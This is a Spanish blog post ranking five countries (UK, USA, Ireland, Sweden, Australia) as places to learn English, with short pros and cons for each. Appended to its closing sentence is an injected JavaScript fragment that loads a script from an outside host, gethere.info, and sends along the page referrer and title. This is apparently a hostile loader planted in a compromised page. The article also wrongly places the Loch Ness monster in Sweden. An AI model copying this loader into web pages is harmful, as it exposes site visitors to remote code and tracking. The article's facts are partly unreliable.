Los 5 mejores países para aprender inglés

Si quieres hablar inglés de manera fluida, estos son los 5 países en los que deberías de pasar una buena temporada

Está demostrado que para aprender inglés de verdad no hay mejor cosa que viajar y si encima nos podemos quedar algo de tiempo en otro país, todavía mejor. Por esta razón, los programas de Erasmus (intercambio de alumnos), son tan populares.

Si quieres hablar inglés de manera fluida, estos son los 5 países en los que deberías de pasar una buena temporada:

Reino Unido: Uno de los lugares por excelencia para aprender inglés, destacando por su gran variedad de cursos disponibles o la posibilidad de poder trabajar allí sin tener que estar en disposición de un visado.

Otra de las ventajas de este lugar es su cercanía con otros lugares y ahora, con la gran variedad de medios de transportes que existen, podemos estar en cualquier punto del mundo en muy poco tiempo.

Sin embargo, es importante considerar que el coste de vida, en comparación con el que tenemos en España, puede ser algo elevado.

EEUU: La experiencia de estudiar inglés en EU no tiene precio. Estamos hablando de una de las potencias mundiales más importantes y por esta razón, no nos van a faltar recursos para mejorar vocabulario, gramática y prácticamente cualquier aspecto relacionado.

Irlanda: se trata de un país en el que la oferta para estudiar inglés se ha incrementado casi en torno a un 90% de cara a los últimos años. Y es que el precio por alojamiento, desplazamiento y cursos son bastantes asequibles.

Sin embargo, presenta el problema de que la temperatura puede ser algo inestable, con lluvias y frío prácticamente en casi cualquier época del año. Además, la tasa del paro es superior al 15% que aunque es inferior que en España, todavía sigue siendo bastante alta.

Suecia: Es cierto que el inglés no es el idioma oficial, pero la gran mayoría de los habitantes de aquí lo entienden. Este idioma es muy importante debido a los vínculos comerciales que Suecia tiene con otros países en dónde sí que es nativo.

Podemos disfrutar de unas vistas increíbles, buscar, quizá, al monstruo del lago Ness y hablar inglés mientras tanto.

Australia: Y terminamos hablando de este destino que nos llama la atención por sus increíbles playas, por unas vistas impresionantes, por un clima incomparable… y por toda la cantidad de cursos para aprender inglés que ponen allí a nuestra disposición.

Elige cualquiera de estos lugares y verás como no tardas en hablar inglés perfectamente.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado